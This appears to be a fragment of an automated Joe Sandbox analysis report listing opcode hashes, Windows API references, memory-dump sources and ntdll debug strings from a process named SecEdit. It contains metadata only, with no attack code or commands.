                                                            • Opcode ID: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction ID: 067f767da3710b388bc7b674d4b308ad89d26ef39592ef6840170b43d2066353
                                                            • Opcode Fuzzy Hash: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction Fuzzy Hash: EEE065B2200204BBCA10EE98DC45FAB37ADEFC9720F408009FD08A7241CB70B8118BB9
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00587BBC
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 346f106ef012eeab0b2d0f87fcdd4f07fea3ae5dc956916af8c5ff15373ca4b5
                                                            • Instruction ID: 5ef0c587c7d4a446322700f3f8cbe65a74b0348651ab9fcef26d501deaf823c5
                                                            • Opcode Fuzzy Hash: 346f106ef012eeab0b2d0f87fcdd4f07fea3ae5dc956916af8c5ff15373ca4b5
                                                            • Instruction Fuzzy Hash: B3E0D83124420857EA2069B8DC45B653348D788720F248960BC1C9B1D1E579E8414350
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00581780,kY,005944C7,?), ref: 005879D3
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: ea0d679fe722e919c2c81e15dceb05912d763369d304a35d84073faadfcb31ac
                                                            • Instruction ID: 4ca8e632e30ddef6f14673ecc58f788288c355300342d604cf92a84ee633de2c
                                                            • Opcode Fuzzy Hash: ea0d679fe722e919c2c81e15dceb05912d763369d304a35d84073faadfcb31ac
                                                            • Instruction Fuzzy Hash: ABD05E723C43063BFA40E6F5DC0BF6A3A8DAB44B94F148464F94CE72C2ED56E51043AA
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 05e701d496272dbb3982f4b221c5399c83a687cdfcc8a7056710a66749507b38
                                                            • Instruction ID: 512490c815a091b1528035ccbb738bc1709aa6b114524f3c65a621d2d865d57b
                                                            • Opcode Fuzzy Hash: 05e701d496272dbb3982f4b221c5399c83a687cdfcc8a7056710a66749507b38
                                                            • Instruction Fuzzy Hash: BEB09B719035D5C6EA51E76046097177D4467D0701F1AC462D3030641F4739C1E1E275
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            Strings
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03044787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030446FC
                                                            • ExecuteOptions, xrefs: 030446A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03044655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03044725
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03044742
                                                            • Execute=1, xrefs: 03044713
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030402BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030402E7
                                                            • RTL: Re-Waiting, xrefs: 0304031E
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 03047B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03047B7F
                                                            • RTL: Re-Waiting, xrefs: 03047BAC
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0304728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 030472A3
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03047294
                                                            • RTL: Re-Waiting, xrefs: 030472C1
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0305CFBD
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4rw@4rw